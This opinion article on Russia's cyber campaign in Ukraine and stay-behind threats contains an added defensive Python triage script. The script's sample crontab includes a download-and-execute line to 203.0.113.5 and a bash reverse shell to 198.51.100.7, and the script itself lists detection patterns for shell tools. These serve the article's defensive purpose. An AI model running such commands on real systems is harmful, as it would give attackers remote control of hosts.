Is Russia about to pivot its cyber war in Ukraine?

With its land forces in retreat, is Russia about to pivot its cyber campaign in Ukraine?
Russia’s war in Ukraine has been a brutal disaster on many levels. In the war’s early stages some commentators expected cyber ‘shock and awe’ as part of Russia’s invasion. Because of the valiant efforts of Ukrainian cyber defenders, supported by nation states and large private organisations like Microsoft, the actual impact was somewhat less shocking and less awesome than expected. Some commentators have now suggested that Russia’s cyber warfare capabilities were as overstated as its conventional prowess. Underestimating Russian cyber capabilities in this context is a mistake.
In the lead-up to the invasion, Russia would have weighed its range of cyber war-fighting options: denying or disrupting Ukrainian critical infrastructure and defences, deception and misinformation, and exploiting its access for intelligence. Russia clearly ran a programme to expand its remote access ahead of the war, followed by some operations to deny and disrupt at a tactical level. The long game it is more likely playing, however, is to exploit that access for intelligence, feeding only selected snippets to the front line for tactical kinetic operations. Like most countries that treat cyber as a war-fighting domain, Russia will hold a collection of highly prized zero-day exploits, but these will be kept in reserve in favour of less exciting but still highly effective commodity operations such as account takeovers and attacks on exposed remote access services.
With Ukraine regaining territory, a complex set of opportunities and threats arises. While occupying Ukrainian terrain, Russian forces had direct physical access to swathes of Ukrainian networks. In their retreat it would be no surprise to see the Russians use cyber ‘stay-behind’ tactics, which can be as simple as leaving firewall rules or management interfaces exposed, installing remote access backdoors, or planting collection tools such as keyloggers together with the persistence mechanisms that keep them running. There is an awful lot of harm Russia could do in this phase, particularly through remote persistence that outlives the physical withdrawal. That is before you consider the insider risk: Russian spies left in Ukraine’s midst. Hopefully Ukraine’s civil and military authorities are including cyber hygiene in their battlefield clearance and the broader processes of liberating territory, treating every recovered network segment as compromised until it has been audited, with unknown accounts and keys removed, credentials rotated and devices re-imaged where possible.
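The clearance step mentioned above is where a practitioner wants a concrete first check. The following is an added example, not part of the original article: a small Python triage script that scans artefacts copied off a recovered Linux host (the password file, a crontab, an SSH authorized_keys file and an iptables-save dump) for common stay-behind indicators. The sample file contents are constructed for the example, and the suspicious-command patterns, the management-port list and the set of known SSH key comments are assumptions to be tuned for a real environment.

```python
"""Triage of a recovered host for stay-behind artefacts (added example, constructed data)."""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    source: str   # which artefact the line came from
    line: str     # the offending line, verbatim
    reason: str   # why it was flagged


# Command idioms that should never appear in a scheduled job on a production host.
# These patterns are an assumption for the example, not an authoritative list.
CRON_SUSPECT = [
    (re.compile(r"(curl|wget)\b.*\|\s*(ba)?sh"), "download piped into a shell"),
    (re.compile(r"/dev/tcp/"), "bash reverse-shell idiom"),
    (re.compile(r"\bnc\b.*\s-e\b"), "netcat with -e (remote shell)"),
    (re.compile(r"base64\s+(-d|--decode)"), "base64-decoded payload"),
]

# Ports that should only ever be accepted from a management network (assumed list).
MGMT_PORTS = {22, 23, 3389, 5900, 8443}

# --- Constructed sample artefacts, as they might be copied off a recovered host ---
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
svc_backup:x:0:0::/var/tmp:/bin/bash
olena:x:1000:1000:Olena:/home/olena:/bin/bash
"""
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -s http://203.0.113.5/u.sh | sh
@reboot /bin/bash -c 'bash -i >& /dev/tcp/198.51.100.7/4444 0>&1'
"""
SAMPLE_AUTHORIZED_KEYS = """ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExample1 olena@workstation
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDExample2
"""
SAMPLE_IPTABLES = """*filter
:INPUT DROP [0:0]
-A INPUT -s 10.20.0.0/16 -p tcp --dport 22 -j ACCEPT
-A INPUT -p tcp --dport 443 -j ACCEPT
-A INPUT -p tcp --dport 3389 -j ACCEPT
COMMIT
"""


def check_passwd(text, allowed_uid0=("root",)):
    """Flag any UID 0 account that is not in the allowed list (a classic backdoor account)."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:
            continue
        name, uid = fields[0], fields[2]
        if uid == "0" and name not in allowed_uid0:
            findings.append(Finding("passwd", line, f"extra UID 0 account '{name}'"))
    return findings


def check_cron(text):
    """Flag scheduled jobs whose command matches a known-bad idiom."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        for pattern, why in CRON_SUSPECT:
            if pattern.search(line):
                findings.append(Finding("cron", line, why))
                break
    return findings


def check_authorized_keys(text, known_comments):
    """Flag SSH keys whose trailing comment is not one the owner recognises (or is absent)."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 2)  # key type, key material, optional comment
        comment = parts[2] if len(parts) == 3 else ""
        if comment not in known_comments:
            findings.append(Finding("authorized_keys", line,
                                    f"unrecognised key comment '{comment or '(none)'}'"))
    return findings


def check_firewall(text, mgmt_ports=MGMT_PORTS):
    """Flag INPUT ACCEPT rules on management ports that carry no source (-s) restriction."""
    findings = []
    for line in text.splitlines():
        if not line.startswith("-A INPUT") or "-j ACCEPT" not in line:
            continue
        dport = re.search(r"--dport\s+(\d+)", line)
        if not dport:
            continue
        port = int(dport.group(1))
        if port in mgmt_ports and not re.search(r"\s-s\s", line):
            findings.append(Finding("firewall", line,
                                    f"management port {port} accepted from any source"))
    return findings


def triage_host(passwd, crontab, authorized_keys, iptables, known_key_comments):
    """Run every check and return the combined list of findings, in artefact order."""
    return (check_passwd(passwd) + check_cron(crontab)
            + check_authorized_keys(authorized_keys, known_key_comments)
            + check_firewall(iptables))


if __name__ == "__main__":
    for f in triage_host(SAMPLE_PASSWD, SAMPLE_CRONTAB, SAMPLE_AUTHORIZED_KEYS,
                         SAMPLE_IPTABLES, {"olena@workstation"}):
        print(f"[{f.source}] {f.reason}: {f.line}")
```

The script only reports; it does not remediate, so a host can be imaged for forensics before anything is changed. It is a first pass over files that are easy to collect, not a substitute for a full investigation: a kernel-level implant, a firmware backdoor on a network device, or a keylogger hidden in a legitimate-looking binary will not show up in any of these four artefacts.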
Tactical mischief using Ukrainian infrastructure isn’t new in this war. In the early days of the invasion we saw Ukrainian IP addresses appearing in numerous attacks around the world. Russia-based attackers were likely using Ukrainian infrastructure that once upon a time would have been avoided or obfuscated, possibly to direct blame Ukraine’s way and possibly just out of convenience; either way, a source address in a Ukrainian range is not evidence of a Ukrainian operator. This spike may also have been influenced by the well-publicised schism in Conti, a mixed Russian/Ukrainian ransomware group that, unsurprisingly, fractured along national lines.
In the coming weeks and months, with Russia’s ground war going badly, it will be no surprise if Russia ramps up its cyber warfare effort, both in the primary theatre of Ukraine and more broadly as it targets Western supply chains to Ukraine, European energy infrastructure, sanctions enablers and the wider political coalition opposing Russia. Russia’s cyber warfare apparatus and its criminal proxies are still capable of launching large-scale symbolic attacks, and they retain the long-game capability of undermining democracy, the rules-based order and unity in the West.


